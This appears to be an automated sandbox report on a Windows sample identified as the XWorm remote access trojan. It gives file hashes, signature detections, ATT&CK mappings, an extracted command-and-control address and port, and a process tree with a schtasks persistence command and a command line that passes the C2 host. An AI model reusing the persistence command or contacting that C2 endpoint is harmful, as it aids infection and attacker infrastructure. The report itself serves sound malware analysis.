Analysis

  • max time kernel
    91s
  • max time network
    106s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    29-03-2023 04:39

General

  • Target

    TGX.exe

  • Size

    38KB

  • MD5

    ee272fb8a6844eb8b30f35614f0baa1f

  • SHA1

    48be70669ce639e648fca442892f458c8729aca0

  • SHA256

    9b752a8369dc49b5fb2164b2b2e9f2ab7c7e8a3f0d99ed38edd7745cc4004236

  • SHA512

    341287070bd21cb60e012473837c54d8cb7f8b322adec81f71215cd86a2116fadcafee44c518f0ba27863c7d0490dd77e23695f55612af0cc03c4a3646f1d785

  • SSDEEP

    768:DzpMBIG6sJLIuv+044PF5Ph9tbkOwhnICFYCgc/:P6PDLfdFD9t4OwW8zJ

Malware Config

Extracted

Family

xworm

C2

browser-bangladesh.at.ply.gg:14018

Mutex

Dmpd64MhhEQE1POv

Attributes
  • install_file

    USB.exe

aes.plain

Signatures

  • Xworm

    Xworm is a remote access trojan written in C#.

  • Drops startup file 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\TGX.exe
    "C:\Users\Admin\AppData\Local\Temp\TGX.exe"
    1⤵
    • Drops startup file
    • Adds Run key to start application
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2028
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "TGX" /tr "C:\Users\Admin\AppData\Roaming\TGX.exe"
      2⤵
      • Creates scheduled task(s)
      PID:1720
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" browser-bangladesh.at.ply.gg 14018 <123456789> 033F3D68184F7F144596
      2⤵
        PID:1044
    • C:\Windows\system32\taskeng.exe
      taskeng.exe {B0A07FAF-B230-4EA2-865E-FE1E98317EFC} S-1-5-21-1563773381-2037468142-1146002597-1000:YBHADZIG\Admin:Interactive:[1]
      1⤵
        PID:1536

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Execution

      Scheduled Task

      1
      T1053

      Persistence

      Registry Run Keys / Startup Folder

      1
      T1060

      Scheduled Task

      1
      T1053

      Privilege Escalation

      Scheduled Task

      1
      T1053

      Defense Evasion

      Modify Registry

      1
      T1112

      Discovery

      System Information Discovery

      1
      T1082

      Query Registry

      1
      T1012

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/2028-54-0x0000000000C20000-0x0000000000C30000-memory.dmp
        Filesize

        64KB

      • memory/2028-55-0x000000001A840000-0x000000001A8C0000-memory.dmp
        Filesize

        512KB

      • memory/2028-59-0x000000001A840000-0x000000001A8C0000-memory.dmp
        Filesize

        512KB

      • memory/2028-61-0x000000001A830000-0x000000001A844000-memory.dmp
        Filesize

        80KB